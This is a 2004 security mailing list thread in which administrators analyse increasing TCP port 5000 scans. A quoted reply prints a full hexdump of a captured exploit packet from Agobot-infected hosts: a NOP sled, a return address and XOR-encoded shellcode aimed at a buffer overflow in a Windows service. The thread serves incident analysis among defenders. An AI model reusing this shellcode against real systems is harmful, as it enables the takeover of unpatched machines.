Security Incidents mailing list archives
Re: TCP port 5000 syn increasing
From: Mike Barushok <barushok () keycreations com>
Date: Mon, 17 May 2004 17:14:40 -0500 (CDT)
Exactly identical to the capture posted at: http://www.linklogger.com/TCP5000_Overflow.htm (That page has title: 'SQL Slammer Capture'). On Mon, 17 May 2004, Noel Cuillandre wrote:
It's a buffer overflow attack on the plug and play service on TCP port 5000. The hexdump corresponds to a SQLSlammer's like worm. Noel Cuillandre Paul Schmehl a écrit :----- Original Message ----- From: "ANDREW STREULE" <brother_wolf () btopenworld com> To: <incidents () securityfocus com> Sent: Monday, May 17, 2004 2:24 PM Subject: Re: TCP port 5000 syn increasingon my honeypot a port 5000 event is almost always followed by 1 or 2 nbt smb events.Here's a hexdump of what I'm seeing on 5000. The ones I'm seeing are coming from boxes infected with Agobot/Gaobot and not just 81.x.x.x. 00000000 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000010 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000020 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000030 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000040 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000050 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000060 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000070 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000080 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000090 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 000000A0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 000000B0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 000000C0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 000000D0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 000000E0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 000000F0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000100 90 90 90 90 90 90 90 90 90 90 90 90 4D 3F E3 77 ............M?.w 00000110 90 90 90 90 FF 63 64 90 90 90 90 90 90 90 90 90 .....cd......... 00000120 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 00000130 90 90 90 90 90 90 90 90 EB 10 5A 4A 33 C9 66 B9 ..........ZJ3.f. 00000140 66 01 80 34 0A 99 E2 FA EB 05 E8 EB FF FF FF 70 f..4...........p 00000150 99 98 99 99 C3 21 95 69 64 E6 12 99 12 E9 85 34 .....!.id......4 00000160 12 D9 91 12 41 12 EA A5 9A 6A 12 EF E1 9A 6A 12 ....A....j....j. 00000170 E7 B9 9A 62 12 D7 8D AA 74 CF CE C8 12 A6 9A 62 ...b....t......b 00000180 12 6B F3 97 C0 6A 3F ED 91 C0 C6 1A 5E 9D DC 7B .k...j?.....^..{ 00000190 70 C0 C6 C7 12 54 12 DF BD 9A 5A 48 78 9A 58 AA p....T....ZHx.X. 000001A0 50 FF 12 91 12 DF 85 9A 5A 58 78 9B 9A 58 12 99 P.......ZXx..X.. 000001B0 9A 5A 12 63 12 6E 1A 5F 97 12 49 F3 9A C0 71 E5 .Z.c.n._..I...q. 000001C0 99 99 99 1A 5F 94 CB CF 66 CE 65 C3 12 41 F3 9D ...._...f.e..A.. 000001D0 C0 71 F0 99 99 99 C9 C9 C9 C9 F3 98 F3 9B 66 CE .q............f. 000001E0 69 12 41 5E 9E 9B 99 9E 24 AA 59 10 DE 9D F3 89 i.A^....$.Y..... 000001F0 CE CA 66 CE 6D F3 98 CA 66 CE 61 C9 C9 CA 66 CE ..f.m...f.a...f. 00000200 65 1A 75 DD 12 6D AA 42 F3 89 C0 10 85 17 7B 62 e.u..m.B......{b 00000210 10 DF A1 10 DF A5 10 DF D9 5E DF B5 98 98 99 99 .........^...... 00000220 14 DE 89 C9 CF CA CA CA F3 98 CA CA 5E DE A5 FA ............^... 00000230 F4 FD 99 14 DE A5 C9 CA 66 CE 7D C9 66 CE 71 AA ........f.}.f.q. 00000240 59 35 1C 59 EC 60 C8 CB CF CA 66 4B C3 C0 32 7B Y5.Y.`....fK..2{ 00000250 77 AA 59 5A 71 62 67 66 66 DE FC ED C9 EB F6 FA w.YZqbgff....... 00000260 D8 FD FD EB FC EA EA 99 DA EB FC F8 ED FC C9 EB ................ 00000270 F6 FA FC EA EA D8 99 DC E1 F0 ED C9 EB F6 FA FC ................ 00000280 EA EA 99 D5 F6 F8 FD D5 F0 FB EB F8 EB E0 D8 99 ................ 00000290 EE EA AB C6 AA AB 99 CE CA D8 CA F6 FA F2 FC ED ................ 000002A0 D8 99 FB F0 F7 FD 99 F5 F0 EA ED FC F7 99 F8 FA ................ 000002B0 FA FC E9 ED 99 0D 0A 0D 0A ......... Paul Schmehl (pauls () utdallas edu) Adjunct Information Security Officer The University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/~pauls/ --------------------------------------------------------------------------- ------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------------------------------------------
-- Mike Barushok Senior Security Administrator KeyCreations.com/KCISP.net/ispKansas.com --------------------------------------------------------------------------- ----------------------------------------------------------------------------
Current thread:
- TCP port 5000 syn increasing Rohny Jotton (May 17)
- Re: TCP port 5000 syn increasing Andreas (May 17)
- Re: TCP port 5000 syn increasing ANDREW STREULE (May 17)
- Re: TCP port 5000 syn increasing Paul Schmehl (May 17)
- Re: TCP port 5000 syn increasing Noel Cuillandre (May 17)
- Re: TCP port 5000 syn increasing Mike Barushok (May 18)
- Re: TCP port 5000 syn increasing ANDREW STREULE (May 17)
- Re: TCP port 5000 syn increasing Andreas (May 17)
- <Possible follow-ups>
- RE: TCP port 5000 syn increasing Terence Runge (May 17)
- RE: TCP port 5000 syn increasing Jose Nazario (May 18)
- RE: TCP port 5000 syn increasing Paul Schmehl (May 18)
- RE: TCP port 5000 syn increasing Frank Knobbe (May 18)
- Re: TCP port 5000 syn increasing Valdis . Kletnieks (May 18)
- Re: TCP port 5000 syn increasing Andreas (May 19)
- Re: TCP port 5000 syn increasing Harlan Carvey (May 19)
- Re: TCP port 5000 syn increasing Valdis . Kletnieks (May 19)
- Re: TCP port 5000 syn increasing Harlan Carvey (May 19)
- RE: TCP port 5000 syn increasing Jose Nazario (May 18)